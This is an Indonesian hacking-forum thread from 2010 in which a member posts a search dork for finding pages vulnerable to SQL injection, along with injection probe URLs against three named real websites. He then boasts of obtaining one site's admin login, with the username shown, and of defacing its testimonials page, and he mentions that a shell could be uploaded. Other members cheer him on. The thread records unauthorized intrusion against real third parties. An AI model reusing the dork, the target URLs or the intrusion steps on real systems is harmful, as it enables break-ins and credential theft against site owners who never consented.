Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

[Bug] SQL injection pada News Read ID (read.php?)

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

[Bug] SQL injection pada News Read ID (read.php?)

Postby poni » Sun May 30, 2010 10:06 pm

Komponen yang terdapat bug sql injection = read.php
DORK: inurl:"read.php?id="

POC
Code: Select all
http://campus.sanook.com/inlove/read.php?id=132'
http://www.inspireyourworld.com/issue6/read.php?id=23'
http://www.wellerpools.com/news-read.php?id=16'
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby poni » Sun May 30, 2010 10:46 pm

Image
http://www.wellerpools.com/news-read.php?id=16'

Image
Dapat deh login Admin + Pass :devil
Admin = chr1sty
Password : ************ cencored
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby shad.hckr » Sun May 30, 2010 10:51 pm

waw... razia neh ceritanya ya mas pon... hehehehe... :ngakak: :ngakak: :ngakak:
but keren juga tuh CMS... :licik: :licik:
User avatar
shad.hckr
 
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby poni » Sun May 30, 2010 10:58 pm

Image
ada gr33tz untuk anda.. check it out
Code: Select all
http://www.wellerpools.com/testimonials.php


Btw. semua komponen bisa dimodifikasi. bahkan bisa upload shell.. tapi gue hanya sebatas edit testimonial.php saja. :P
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby poni » Sun May 30, 2010 11:13 pm

shad.hckr wrote:waw... razia neh ceritanya ya mas pon... hehehehe... :ngakak: :ngakak: :ngakak:
but keren juga tuh CMS... :licik: :licik:


iya.. lagi ga ada kerjaan, masih banyak web yang vuln dengan konten tersebut. cek aja dorknya
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby demonbrando » Sun May 30, 2010 11:29 pm

wah,abang poni mantep dah... :devil tapi sayangnya passwordnya di sensor??? :putusasa:
jalani hidup ini dengan santai tapi jangan lupa ibadah..
User avatar
demonbrando
 
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby shad.hckr » Sun May 30, 2010 11:36 pm

wekekeke..

Code: Select all
poni : Miss christy, we don`t do any harm on the system. Just put this message . so you may fix your web soon. thanks

Gr33tz:

   ^Family-Code^, ^rumput_kering^, 0x99/JerryMaheswara, Paman, XShadow, psychopath, fl3xu5, gblack, mas_agung, Jundi, ^_xfree_^, systemofadown, yadoy666
, Phychole, Wilmar_Kidz, 3xtr3m3b0y, Darkzzzz, Shad.hckr,  And You... the marvellous XCoders those change the Indonesian Undergorund scenes

Http://forum.xcode.or.id


keren mas.. =))

Xcode gak kalah ma agnes monica yang Go International.. :ngakak: :ngakak:
User avatar
shad.hckr
 
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby anjay » Sun May 30, 2010 11:37 pm

mantabz om poni :love:
Diatas Langit Masih Ada Langit
Jadilah Ilmu Padi, Semakin Berisi Semakin Merunduk
anjay
 
Posts: 9
Joined: Sun Sep 16, 2007 3:13 pm

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby shinichi81 » Mon May 31, 2010 10:16 am

upload dong bos poni POC-nya... :tapa: :tapa: :tapa: :tapa:
............make a wish............
User avatar
shinichi81
 
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: [Bug] SQL injection pada News Read ID (read.php?)

Postby peniru » Mon May 31, 2010 10:20 am

wih.. nambah lagi nih bhan belajar.... :love: :love:

tq kk poni..... :devil :devil
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
User avatar
peniru
 
Posts: 383
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar

leave a comment

Next

Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 7 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id